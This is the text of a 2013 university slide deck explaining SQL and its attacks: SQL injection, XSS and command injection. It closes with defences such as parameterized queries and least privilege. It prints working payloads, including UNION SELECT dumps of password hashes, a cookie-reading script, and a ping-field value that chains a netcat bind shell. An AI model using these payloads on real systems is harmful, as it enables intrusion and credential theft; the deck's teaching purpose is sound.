Survey
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Nick Tsamis University of Tulsa CS 7493 April 2013 What is SQL? Why SQL Matters. *yawn* What’s the big deal? What could possibly go wrong? SQL Injection XSS Command Execution *pffft* So we shouldn’t use SQL? That’s some smart SQL! Structured Query Language Language Specialized programming language Utilized in relational databases Query Raw data is queried to obtain information “Our business is turning data into information.” – Michael A. Peterson Structured Adheres to a strict, defined format Query Table Column • Top down flow only Relational Databases vs Hierarchical Databases • Data relations are stored Popularity One of the first commercial languages for relational models Today, exists as the de facto standard (ANSI and ISO) It’s EVERYWHERE Versatility It’s flexible: T-SQL MySQL LINQ Vulnerabilities SQL is powerful…if you grant it Manages data some of which is sensitive Provides a great entry point for access Recovering lost password: *yawn* Security is not always implicit Raw SQL can be very vulnerable to simple injections if $EMAIL = “anything' OR 'x'='x” SQL Injection Injecting unintended code into a query Returning user name from ID Source code Injections. The attack We add a second condition that will always examine true (1=1) Purpose is to dump all user information $id = ‘ or 1=1 # WHERE user_id = ‘ ’ or 1=1 # ’ ”; SQL Injection Injecting unintended code into a query Returning sql information The attack(s) We add a union select to dump additional data $id = ‘ union SELECT 1, user() # Yields current sql user $id = ‘ and 1=1 union select database(),version() # Yields current sql version and database name Injections. SQL Injection Injecting unintended code into a query Case Study Returning the good stuff!! The attack(s) We add a union select to dump password data $id = ‘ union select user, password FROM users # Yields current user and associated password (hash) Injections. XSS (Cross Site Scripting) Execute unintended scripts inline Throw an alert Passed as a url argument XSS. What if we put an inline script in that url? Alert box shown: XSS (Cross Site Scripting) Well that wasn’t exactly l33t… Have a cookie <script>alert(document.cookie)</script> Alert box shown: XSS. More serious implications: Run a custom script that can open a remote connection (backdoor) Read and dump configuration data (SQL or OS) Command Execution Use the secret entrance A site that allows for free IP Pinging Sample source: Execution. Concatenating commands might work… 192.168.200.128;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 8999 > /tmp/pipe Attempts to allow connections on port 8999 with netcat (nc) Upon execution, browser waits for connection on port 8999 Better SQL Stored Procedures Preformat and secure a static query Grant access to a SP, not the tables it accesses Typically increased performance Parameter check – data typing No network traffic – run inside the engine *pffft* String Filtering/Escaping String escape characters ‘ “ \ NUL No, we should use better SQL. Mo’ Better SQL Parameterized SQL Strongly typed data is bound on execution Parameters are populated and checked User input is not directly embedded *pffft* Database Management Permission limitation Principle of Least Privilege No, we should use better SQL. http://upload.wikimedia.org/wikipedia/commons/thumb /e/eb/Hierarchical_Model.svg/320pxHierarchical_Model.svg.png http://www.ibm.com/developerworks/library/xmatters8/relat.gif http://upload.wikimedia.org/wikipedia/commons/a/aa/S QL_ANATOMY_wiki.svg http://www.unixwiz.net/techtips/sql-injection.html http://wikipedia.org http://www.codinghorror.com/blog/2005/04/give-meparameterized-sql-or-give-me-death.html